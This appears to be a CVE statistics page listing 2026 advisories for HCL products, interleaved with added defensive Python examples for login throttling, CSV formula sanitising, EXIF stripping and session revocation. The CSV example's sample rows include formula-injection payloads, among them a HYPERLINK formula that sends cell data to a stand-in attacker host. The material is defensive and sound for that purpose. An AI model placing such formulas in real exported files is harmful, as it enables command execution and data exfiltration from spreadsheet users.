HCL


Products by HCL, sorted by number of security vulnerabilities since 2018

HCL AION: 38 vulnerabilities
HCL BigFix: 27 vulnerabilities
HCL Unica: 13 vulnerabilities
HCL MyXalytics: 7 vulnerabilities
HCL DevOps Loop: 1 vulnerability
HCL Domino AppDev Pack: 1 vulnerability
HCL iAutomate: 1 vulnerability

By the Year

In 2026 there have been 86 vulnerabilities published for HCL products, with an average CVSS base score of 4.2 out of ten. In 2025, HCL had 39 security vulnerabilities published, so 47 more vulnerabilities have already been reported in 2026 than in all of last year. Last year's average CVE base score was higher by 0.93.

Year   Vulnerabilities   Average base score
2026   86                4.23
2025   39                5.16
2024   5                 5.60
2023   1                 5.30

It may take a day or so for new HCL vulnerabilities to show up in the statistics or in the list of recent security vulnerabilities. Additionally, vulnerabilities may be tagged under a different product or component name than the one you expect, so a product count above can be lower than the number of advisories that actually affect it.

Recent Hcl Security Vulnerabilities

Each entry gives the CVE ID, the publication date, the product tag where the site assigns one, a short title, and the advisory description.

CVE-2025-62338  Jun 04, 2026  [Bigfix]
HCL BigFix Cloud Lifecycle Management: Input Validation Flaw Enables Information Exposure
HCL BigFix Cloud Lifecycle Management is affected by a lack of input validation, which may lead to an information exposure vulnerability. This low-severity flaw could allow unauthorized access.

CVE-2025-59874  Jun 04, 2026
CSP Directive Missing in HCL Hive Telco Observability Keycloak Web App
HCL Hive Telco Observability is affected by a Content Security Policy (CSP) that lacks required directives; the issue was detected in the Keycloak component of the web application. Missing essential directives can leave a site vulnerable.

CVE-2025-52606  Jun 04, 2026
HCL iControl Weak Input Validation (WIV) Vulnerability
HCL iControl was affected by a Weak Input Validation vulnerability. This weakness arises during the implementation of an architectural security tactic: the application receives input that is expected to be of a certain type, but does not validate, or incorrectly validates, that the input is actually of the expected type.

CVE-2025-52608  Jun 04, 2026
HCL iControl Missing Cookie Attributes (Secure, SameSite)
HCL iControl was affected by a Missing Cookie Attributes vulnerability. The application omits several critical cookie attributes, including Secure and SameSite, and the cookie Path is set to the root.

CVE-2025-52609  Jun 04, 2026
HCL iControl XSS via Missing Security Headers
HCL iControl was affected by a Missing Security Headers vulnerability. The absent headers are those that enable the built-in XSS filtering mechanisms of modern web browsers, so their absence can facilitate cross-site scripting (XSS) attacks.

CVE-2025-52611  Jun 04, 2026
HCL iControl v4.0.0 Stack Trace Disclosure via Undefined JS Property
HCL iControl v4.0.0 was affected by an Unhandled Exception - Stack Trace Disclosure vulnerability. The error occurs because the application's JavaScript code accesses an undefined property: specifically, it attempts to read the property dashboard key from an object that is undefined. This issue likely stems from one of the following: a missing or improperly initialized object.

CVE-2025-52612  Jun 04, 2026
Reflected XSS via CSV Export in HCL iControl
HCL iControl was affected by a CSV Injection vulnerability in its Export CSV function and is also vulnerable to reflected cross-site scripting; both are caused by insufficient sanitization of input parameters.
CVE-2024-42206  Jun 02, 2026
HCL iReflection Web App Uses Outdated, Vulnerable Components
A third-party vulnerable and outdated components issue was detected in the HCL iReflection web application.

CVE-2025-31985  May 20, 2026  [Bigfix]
HCL BigFix SM: X-Content-Type-Options Header Misconfiguration Permits Browser MIME Sniffing
HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure X-Content-Type-Options header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly.

CVE-2025-31973  May 20, 2026  [Bigfix]
Insecure Base Image Use in HCL BigFix Service Management
HCL BigFix Service Management (SM) is susceptible to a configuration weakness, 'Insecure Use of Base Image Version'. Using outdated or insecure base images may introduce known vulnerabilities, potentially increasing the risk of exploitation in the application environment.
CVE-2025-62305  May 14, 2026  [Aion]
Out-of-Band Disclosure in HCL AION
HCL AION is affected by a vulnerability where certain operations may trigger out-of-band interactions, potentially resulting in unintended disclosure of sensitive information. Such behaviour may allow exposure of data to external systems under specific conditions.

CVE-2025-62317  May 14, 2026  [Aion]
HCL AION Sensitive Data Disclosure via URL Parameters
HCL AION is affected by a vulnerability where sensitive information may be included in URL parameters. Passing sensitive data in URLs may expose it through browser history, logs, or intermediary systems, potentially leading to unintended information disclosure under certain conditions.

CVE-2025-62308  May 14, 2026  [Aion]
Sensitive Backend Information Disclosure in HCL AION
HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may assist in further analysis or targeted actions under certain conditions.

CVE-2025-62309  May 14, 2026  [Aion]
HCL AION Information Disclosure via Browser Autocomplete
HCL AION is affected by a vulnerability where auto-complete functionality is enabled for certain input fields. This may allow sensitive information to be stored in the browser, potentially leading to unintended exposure under specific conditions.

CVE-2025-62312  May 14, 2026  [Aion]
HCL AION Basic Authorization Token Leak
HCL AION is affected by a vulnerability where basic authorization tokens are used for authentication. Use of basic authorization mechanisms may expose credentials to interception or misuse, especially if not combined with secure transmission practices.

CVE-2025-62316  May 14, 2026  [Aion]
HCL AION HTTP Response Header Misconfiguration Weakens Browser Security
HCL AION is affected by a vulnerability where certain security-related HTTP response headers are not properly configured. Absence of these headers may reduce the effectiveness of browser-based security controls and could expose the application to limited security risks under specific conditions.

CVE-2025-62313  May 14, 2026  [Aion]
HCL AION Brute-Force Access via Missing Authentication Throttling
HCL AION is affected by a vulnerability where adequate protections against brute-force attempts are not enforced. This may allow repeated authentication attempts, potentially leading to unauthorized access or account compromise under certain conditions.

CVE-2025-62311  May 14, 2026  [Aion]
HCL AION Backend Service Data Exposure via Insecure HTTP
HCL AION is affected by a vulnerability where backend service details may be transmitted over insecure HTTP channels. This may expose sensitive information to interception or unauthorized access during transmission under certain conditions.

CVE-2025-62310  May 14, 2026  [Aion]
Unencrypted Data Exposure in HCL AION: Encryption Not Enforced
HCL AION is affected by a vulnerability where encryption is not enforced for certain data transmissions or operations. This may expose sensitive information to interception or unauthorized access under specific conditions.
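CVE-2025-62313 above describes the absence of brute-force protection on authentication. The following is an added example of the control that advisory implies, not HCL code: a per-account and per-source-address lockout with exponential backoff, wrapped around a login function. The credential store, user names and addresses are constructed for the demo; the injectable clock exists so lockouts can be exercised without sleeping.

```python
"""Lockout with exponential backoff for an authentication endpoint.

Added example, not HCL code; in-memory state, standard library only. In
production the counters would live in a shared store (e.g. Redis) so every
application instance sees the same failure history.
"""
import hmac
import time


class ManualClock:
    """Injectable clock so lockouts can be tested without sleeping."""

    def __init__(self, start=0.0):
        self.now = start

    def __call__(self):
        return self.now


class LoginThrottle:
    """Counts failed attempts per account and per source address.

    After `max_failures` consecutive failures a key is locked for
    base_lock_seconds * 2**(lockouts - 1) seconds, capped at max_lock_seconds.
    """

    def __init__(self, max_failures=5, base_lock_seconds=30,
                 max_lock_seconds=3600, clock=time.monotonic):
        self.max_failures = max_failures
        self.base = base_lock_seconds
        self.cap = max_lock_seconds
        self.clock = clock
        self._state = {}  # key -> [failures, locked_until, lockouts]

    @staticmethod
    def _keys(username, source_ip):
        # Username is lower-cased so "Alice" and "alice" share one counter.
        return ("user", username.lower()), ("ip", source_ip)

    def retry_after(self, username, source_ip):
        """Seconds until the next attempt is allowed; 0 when not locked."""
        now = self.clock()
        waits = [self._state.get(k, [0, 0.0, 0])[1] - now
                 for k in self._keys(username, source_ip)]
        return max(0.0, *waits)

    def record_failure(self, username, source_ip):
        now = self.clock()
        for key in self._keys(username, source_ip):
            entry = self._state.setdefault(key, [0, 0.0, 0])
            entry[0] += 1
            if entry[0] >= self.max_failures:
                entry[2] += 1
                entry[1] = now + min(self.base * 2 ** (entry[2] - 1), self.cap)
                entry[0] = 0  # window restarts after the lock expires

    def record_success(self, username, source_ip):
        # A correct password clears the account counter but not the source
        # address: one IP cycling through many accounts stays throttled.
        self._state.pop(("user", username.lower()), None)


# Constructed demo credential store. Real code compares password hashes.
_DEMO_USERS = {"alice": "correct horse battery staple"}


def login(throttle, username, password, source_ip):
    """Return ('ok' | 'locked' | 'denied', seconds_until_retry)."""
    wait = throttle.retry_after(username, source_ip)
    if wait > 0:
        return "locked", wait
    expected = _DEMO_USERS.get(username, "")
    # compare_digest runs in constant time for equal-length inputs.
    if expected and hmac.compare_digest(expected.encode(), password.encode()):
        throttle.record_success(username, source_ip)
        return "ok", 0.0
    throttle.record_failure(username, source_ip)
    return "denied", 0.0


if __name__ == "__main__":
    clock = ManualClock()
    throttle = LoginThrottle(max_failures=3, base_lock_seconds=10, clock=clock)
    for _ in range(3):
        print(login(throttle, "alice", "wrong", "10.0.0.1"))
    print(login(throttle, "alice", "correct horse battery staple", "10.0.0.1"))  # locked
    clock.now = 11
    print(login(throttle, "alice", "correct horse battery staple", "10.0.0.1"))  # ok
```

Keying on both the account and the source address matters: a per-account counter alone lets one source spray a common password across thousands of accounts without ever tripping a lock, and a per-IP counter alone lets a distributed attacker hammer one account. The second lockout of the same key lasts twice as long as the first, which keeps a patient attacker's rate falling without permanently locking a legitimate user out.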
CVE-2024-30151  May 06, 2026  [Bigfix]
Broken Access Control in HCL BigFix SM (SX) Enables Privilege Escalation
HCL BigFix Service Management (SX) is affected by a Broken Access Control vulnerability leading to privilege escalation. This could allow unauthorized users to gain elevated privileges, bypassing intended access restrictions, and may result in exposure of sensitive data or unauthorized system modifications.

CVE-2025-31960  May 06, 2026  [Bigfix]
Information Exposure via Unhandled Exception in HCL BigFix SM Reporting
HCL BigFix Service Management (SM) is vulnerable to information exposure due to improper error handling within its reporting module. Supplying an invalid or out-of-range value to the consumer_company parameter during a report-viewing request causes the application to trigger an unhandled exception.

CVE-2025-31974  May 06, 2026  [Bigfix]
HCL BigFix SM Root Filesystem Not Read-Only Allows Changes to Critical Components
HCL BigFix Service Management (SM) is susceptible to a 'Root File System Not Mounted as Read-Only' misconfiguration. An improperly configured root file system may allow unintended modifications to critical system components, potentially increasing the risk of system compromise or unauthorized changes.

CVE-2025-31975  May 06, 2026  [Bigfix]
HCL BigFix SM Information Disclosure: Server Banner Reveals Versions
An information disclosure issue via the server banner was identified in HCL BigFix Service Management (SM). Exposed server banners may reveal software versions and system details, potentially aiding attackers in targeting known vulnerabilities.

CVE-2025-52613  May 06, 2026  [Bigfix]
HCL BigFix SM Vulnerable WSGI Server Enables Unauthorized Access
HCL BigFix Service Management (SM) was found to use a vulnerable WSGI server. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access.

CVE-2025-31976  May 06, 2026  [Bigfix]
Insufficiently Protected Credentials in HCL BigFix SM
HCL BigFix Service Management (SM) is vulnerable to insufficiently protected credentials: for a short duration while communicating with a backend, internal application, the credentials could be exfiltrated and misused by an attacker.

CVE-2025-31978  May 06, 2026  [Bigfix]
HCL BigFix SM CSV/XLS/XLSX Sanitization Bypass
HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
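CVE-2025-31978 above (and CVE-2025-52612 in the HCL iControl entries earlier on this page) are both spreadsheet formula injection through exported CSV: a field beginning with =, +, -, @, or a tab or carriage return is executed as a formula when the export is opened. The following is an added example of an export-side fix, not HCL code. It neutralises such cells with a leading apostrophe and quotes every field; the rows are constructed to show the attacker-controlled values the advisories describe.

```python
"""Neutralise spreadsheet formula injection in exported CSV cells.

Added example, not HCL code. Uses only the standard library.
"""
import csv
import io

# Characters that make Excel, LibreOffice or Google Sheets treat a cell as a
# formula. Leading whitespace is ignored by those applications, so it is
# stripped before the check; a leading tab or CR is checked on the raw value.
FORMULA_LEADERS = ("=", "+", "-", "@")
CONTROL_LEADERS = ("\t", "\r")


def neutralize_cell(value):
    """Return a cell value that spreadsheet software will treat as plain text.

    Only strings are touched: numbers are rendered with str() unchanged, so a
    negative figure in a numeric column is not turned into "'-5".
    """
    if value is None:
        return ""
    if not isinstance(value, str):
        return str(value)
    if value.startswith(CONTROL_LEADERS) or value.lstrip().startswith(FORMULA_LEADERS):
        # A leading apostrophe forces text mode in every major spreadsheet
        # application and is not displayed in the cell.
        return "'" + value
    return value


def export_rows(rows):
    """Render rows as CSV text with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample rows, as an attacker might plant them in a free-text field.
SAMPLE_ROWS = [
    ["id", "ticket_title", "balance"],
    [1, "Printer jam", -5],
    [2, "=cmd|' /C calc'!A0", 0],
    [3, "  @SUM(1+9)*cmd|' /C calc'!A0", 12],
    [4, '=HYPERLINK("https://attacker.example/?"&A1,"click")', 3],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

The trade-off is that a free-text string that legitimately starts with a minus sign (a phone number written as "-1234", say) also gets the apostrophe; that is why numeric columns should be exported as numbers rather than pre-formatted strings. Quoting every field (csv.QUOTE_ALL) additionally stops a cell containing a comma or newline from breaking out of its column, which is the other half of the CSV injection problem.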
CVE-2025-31959  May 06, 2026  [Bigfix]
HCL BigFix SM EXIF Metadata Exposure
The HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared.
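CVE-2025-31959 above is the upload service re-serving images with their EXIF block (and so any GPS position) intact. The following is an added example of the fix, not HCL code: a pure-standard-library routine that walks the JPEG marker segments and drops every APP1 segment, which is where both Exif and XMP metadata live, while copying the image data through unchanged. The sample JPEG is constructed inline from marker segments; it is not a real photograph.

```python
"""Strip Exif/XMP (APP1) segments from a JPEG without re-encoding the image.

Added example, not HCL code. Standard library only.
"""
import struct

SOI, EOI, SOS, APP1 = 0xD8, 0xD9, 0xDA, 0xE1
# Markers that carry no length field: TEM (0x01) and RST0..RST7.
STANDALONE = {0x01, *range(0xD0, 0xD8)}


def strip_app1(jpeg: bytes) -> bytes:
    """Return a copy of `jpeg` with every APP1 segment removed.

    Exif (including GPS tags) and XMP metadata both live in APP1 segments,
    which sit between the SOI marker and the first SOS marker. Everything from
    SOS onward (the entropy-coded image data) is copied verbatim, so the
    pixels are untouched and no decoder is needed.
    """
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    out = bytearray(b"\xff\xd8")
    pos, end = 2, len(jpeg)
    while pos < end:
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos < end and jpeg[pos] == 0xFF:  # skip 0xFF fill bytes
            pos += 1
        if pos >= end:
            raise ValueError("truncated JPEG: marker without code")
        marker = jpeg[pos]
        if marker == 0x00:
            raise ValueError(f"stuffed byte outside entropy data at offset {pos}")
        if marker == EOI:
            out += b"\xff\xd9"
            break
        if marker in STANDALONE:
            out += bytes([0xFF, marker])
            pos += 1
            continue
        if pos + 3 > end:
            raise ValueError("truncated JPEG: missing segment length")
        seg_len = struct.unpack(">H", jpeg[pos + 1:pos + 3])[0]
        seg_end = pos + 1 + seg_len  # length field counts itself
        if seg_len < 2 or seg_end > end:
            raise ValueError(f"bad segment length at offset {pos}")
        if marker == SOS:
            out += jpeg[pos - 1:]  # scan header, image data and EOI, verbatim
            break
        if marker != APP1:  # keep JFIF (APP0), DQT, SOF, DHT and the rest
            out += jpeg[pos - 1:seg_end]
        pos = seg_end
    return bytes(out)


def contains_exif(jpeg: bytes) -> bool:
    """Cheap upload-time gate: is there an Exif APP1 block in the file?"""
    return b"\xff\xe1" in jpeg and b"Exif\x00" in jpeg


def _segment(marker: int, payload: bytes) -> bytes:
    """Build a marker segment for the constructed sample below."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample, not a real photo: JFIF header, an Exif APP1 block with a
# fake GPS payload, a quantisation table, a scan header, a few bytes of image
# data (including an 0xFF00 stuffed byte) and EOI.
APP0_JFIF = _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
APP1_EXIF = _segment(0xE1, b"Exif\x00\x00MM\x00*\x00\x00\x00\x08" + b"GPSLatitude=FAKE")
DQT = _segment(0xDB, b"\x00" + bytes(64))
SOS_SEG = _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
IMAGE_DATA = b"\x12\x34\xff\x00\x56"
SAMPLE_JPEG = b"\xff\xd8" + APP0_JFIF + APP1_EXIF + DQT + SOS_SEG + IMAGE_DATA + b"\xff\xd9"
EXPECTED_CLEAN = b"\xff\xd8" + APP0_JFIF + DQT + SOS_SEG + IMAGE_DATA + b"\xff\xd9"

if __name__ == "__main__":
    cleaned = strip_app1(SAMPLE_JPEG)
    print(len(SAMPLE_JPEG), "->", len(cleaned), "bytes; exif present:", contains_exif(cleaned))
```

Working at the segment level rather than decoding and re-encoding keeps the upload lossless and sidesteps the image-parsing attack surface of a full decoder, but it only covers JPEG; PNG (eXIf, tEXt, iTXt chunks) and HEIC need their own handling, and the same strip should run on every upload path, not just the profile-picture form.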
CVE-2025-31982  May 06, 2026  [Bigfix]
Unlinked Directory Access Enables Information Disclosure in HCL BigFix SM
HCL BigFix Service Management (SM) had directories that were not linked or publicly visible but could be accessed directly. This increases the risk of information disclosure or misuse of sensitive functionality.

CVE-2025-31984  May 06, 2026  [Bigfix]
HCL BigFix SM MIME-Type Sniffing via Missing X-Content-Type-Options Header
HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure X-Content-Type-Options header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly.

CVE-2025-31983  May 06, 2026  [Bigfix]
HCL BigFix SM CSP Header Misconfiguration Enables XSS
HCL BigFix Service Management (SM) is affected by a security misconfiguration vulnerability in its Content-Security-Policy header. This could allow attackers to inject malicious scripts, increasing the risk of cross-site scripting (XSS) and potential exposure of sensitive information.

CVE-2025-31957  May 06, 2026  [Bigfix]
HCL BigFix SM CSRF Enables Unauthorized Changes
HCL BigFix Service Management (SM) is affected by a Cross-Site Request Forgery (CSRF) vulnerability. This could lead to unauthorized changes or exposure of sensitive data.

CVE-2025-62345  May 06, 2026  [Bigfix]
HCL BigFix RunBookAI Input Handling Vulnerability
HCL BigFix RunBookAI is affected by a 'Continued Availability of Less-Secure Input Text' vulnerability. A component contains a security weakness in its input handling implementation, increasing the risk of misconfiguration and operational errors.

CVE-2025-31951  May 06, 2026  [Bigfix]
HCL BigFix RunBookAI Command Smuggling via Unvalidated Input
HCL BigFix RunBookAI is affected by an Unvalidated Command Input / Potential Command Smuggling vulnerability. A flaw in a component's input handling was identified that could permit unauthorized command execution.

CVE-2025-59854  May 06, 2026
HCL DFXAnalytics: Obsolete X-XSS-Protection Header (CSP Bypass)
HCL DFXAnalytics is affected by an Insecure Security Header Configuration vulnerability: the application uses the outdated X-XSS-Protection header, which could allow an attacker to exploit browser-specific rendering flaws or bypass security controls that should instead be managed by a robust Content Security Policy (CSP).

CVE-2025-59853  May 06, 2026
HCL DFXAnalytics Improper Error Handling Exposes Detailed Stack Traces
HCL DFXAnalytics is affected by an Improper Error Handling vulnerability: the application exposes detailed stack traces in responses, which could give an attacker insight into the application's internal structure, code logic, and environment configuration.

CVE-2025-59852  May 06, 2026
HCL DFXAnalytics Insufficient Transport Layer Protection: Unencrypted Data Transmission
HCL DFXAnalytics is affected by an Insufficient Transport Layer Protection vulnerability: data is transmitted over the network without encryption, which could allow an attacker to compromise the confidentiality, integrity, and authentication of sensitive information.

CVE-2025-59851  May 06, 2026
HCL DFXAnalytics Uses Components with Known Vulnerabilities
HCL DFXAnalytics is affected by a Using Components with Known Vulnerabilities flaw: the application uses unpatched libraries or sub-components, which could allow an attacker to identify and exploit publicly known security vulnerabilities to gain unauthorized access or compromise the application.

CVE-2025-31970  May 06, 2026
HCL DFXAnalytics CSP Header Misconfiguration Allows XSS
HCL DFXAnalytics is affected by an Insecure Security Header Configuration vulnerability: the Content-Security-Policy does not define strict directives for object-src and base-uri, which could allow an attacker to exploit injection vectors such as cross-site scripting (XSS).
CVE-2025-52641  Apr 15, 2026  [Aion]
HCL AION Filesystem Structure Disclosure via System Behaviour
HCL AION is affected by a vulnerability where certain system behaviours may allow exploration of internal filesystem structures. Exposure of such information may provide insight into the underlying environment, which could aid further targeted actions or limited information disclosure.

CVE-2025-55261  Mar 26, 2026
Missing Function Level Access Control in HCL Aftermarket DPC
HCL Aftermarket DPC is affected by Missing Function Level Access Control, which allows an attacker to escalate privileges and may let them compromise the application and steal or manipulate data.

CVE-2025-55262  Mar 26, 2026
SQL Injection in HCL Aftermarket DPC Enables Data Retrieval
HCL Aftermarket DPC is affected by SQL Injection, which an attacker can exploit to retrieve sensitive information from the database.

CVE-2025-55263  Mar 26, 2026
HCL Aftermarket DPC Hardcoded Sensitive Data Exposes Secrets
HCL Aftermarket DPC is affected by Hardcoded Sensitive Data: an attacker who gains access to the source code, or to an insecure repository where it is stored, can easily retrieve these hardcoded secrets.

CVE-2025-55264  Mar 26, 2026
Session Hijack: HCL Aftermarket DPC Sessions Persist After Password Change
HCL Aftermarket DPC is affected by Failure to Invalidate Session on Password Change: an attacker who already has access to a session can maintain control over the account despite the password change, leading to account takeover.

CVE-2025-55265  Mar 26, 2026
HCL Aftermarket DPC: File Discovery Enables Sensitive File Read
HCL Aftermarket DPC is affected by File Discovery, which an attacker could exploit to read sensitive files present on the system and use them to craft further attacks.

CVE-2025-55266  Mar 26, 2026
HCL Aftermarket DPC Session Fixation Vulnerability
HCL Aftermarket DPC is affected by Session Fixation, which allows an attacker to take over a user's session and use it to carry out unauthorized transactions on the user's behalf.

CVE-2025-55267  Mar 26, 2026
HCL Aftermarket DPC Unrestricted File Upload
HCL Aftermarket DPC is affected by an Unrestricted File Upload vulnerability, which allows an attacker to upload and execute malicious scripts, gaining full control over the server.

CVE-2025-55268  Mar 26, 2026
Denial of Service via Spamming in HCL Aftermarket DPC
HCL Aftermarket DPC is affected by a Spamming vulnerability: an actor's excessive spamming can consume server bandwidth and processing resources, which may lead to denial of service.

CVE-2025-55269  Mar 26, 2026
HCL Aftermarket DPC Vulnerable to Weak Password Policy
HCL Aftermarket DPC is affected by a Weak Password Policy vulnerability, which makes it easier for attackers to guess weak passwords or use brute-force techniques to gain unauthorized access to user accounts.

CVE-2025-55270  Mar 26, 2026
HCL Aftermarket DPC Improper Input Validation: XSS / SQL / Command Injection
HCL Aftermarket DPC is affected by Improper Input Validation, which allows an attacker to inject executable code and carry out attacks such as XSS, SQL injection and command injection.

CVE-2025-55271  Mar 26, 2026
HCL Aftermarket DPC HTTP Response Splitting May Allow Command Execution
HCL Aftermarket DPC is affected by an HTTP Response Splitting vulnerability; depending on how the web application handles the split response, an attacker may be able to execute arbitrary commands or inject harmful content into the response.
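CVE-2025-55266 (session fixation) and CVE-2025-55264 (sessions surviving a password change) above are two failures of the same session lifecycle. The following is an added example, not HCL code, of a server-side session store that closes both: the session ID presented at login is discarded and a fresh one minted, so a planted ID never becomes authenticated, and a password change revokes every other session of the account. The user table, names and PBKDF2 parameters are constructed for the demo; the store is in-memory, and the same two rules apply unchanged to a database- or Redis-backed store.

```python
"""Session handling that defeats session fixation and revokes sessions on
password change.

Added example, not HCL code. In-memory store, standard library only.
"""
import hashlib
import os
import secrets
import time


class SessionStore:
    def __init__(self, ttl_seconds=3600, clock=time.monotonic):
        self._sessions = {}   # sid -> {"user": str | None, "issued": float}
        self._by_user = {}    # username -> set of sids
        self.ttl = ttl_seconds
        self.clock = clock

    def create_anonymous(self):
        """Pre-login session (e.g. for a CSRF token or a shopping basket)."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "issued": self.clock()}
        return sid

    def login(self, presented_sid, username):
        """Bind a fresh session ID to the user; the presented ID dies here.

        If an attacker planted `presented_sid` in the victim's browser
        (session fixation), they never learn the ID that becomes authenticated.
        """
        self._sessions.pop(presented_sid, None)
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username, "issued": self.clock()}
        self._by_user.setdefault(username, set()).add(sid)
        return sid

    def user_for(self, sid):
        """Username bound to `sid`, or None if unknown, anonymous or expired."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self.clock() - entry["issued"] > self.ttl:
            self.revoke(sid)
            return None
        return entry["user"]

    def revoke(self, sid):
        entry = self._sessions.pop(sid, None)
        if entry and entry["user"]:
            self._by_user.get(entry["user"], set()).discard(sid)

    def revoke_all_for(self, username, keep_sid=None):
        """Revoke every session of `username`; returns how many were dropped."""
        dropped = 0
        for sid in list(self._by_user.get(username, ())):
            if sid != keep_sid:
                self.revoke(sid)
                dropped += 1
        return dropped


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; returns salt || digest."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt + digest


def change_password(store, users, username, new_password, current_sid):
    """Update the stored hash and kill every other session of the account.

    The session that performed the change (`current_sid`) is kept so the user
    is not logged out of the device they are holding.
    """
    users[username] = hash_password(new_password)
    return store.revoke_all_for(username, keep_sid=current_sid)


# Constructed user table: username -> salted PBKDF2 hash.
USERS = {"alice": hash_password("old-password")}

if __name__ == "__main__":
    store = SessionStore()
    planted = store.create_anonymous()          # ID an attacker could have fixed
    browser = store.login(planted, "alice")     # victim logs in
    other_device = store.login(store.create_anonymous(), "alice")
    print("planted id still valid:", store.user_for(planted) is not None)
    print("revoked on password change:", change_password(store, USERS, "alice", "new-password", browser))
    print("other device still logged in:", store.user_for(other_device) is not None)
```

Keeping the session-to-user index (`_by_user`) is what makes the password-change revocation O(sessions of that user) rather than a scan of the whole store; it is the piece most often missing in applications that "invalidate the session" by only clearing the cookie in the current browser. Expired entries are dropped lazily on lookup, which is enough for a demo; a real store also needs a periodic sweep so abandoned sessions do not accumulate.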
Built by Foundeo Inc., with data from the National Vulnerability Database (NVD).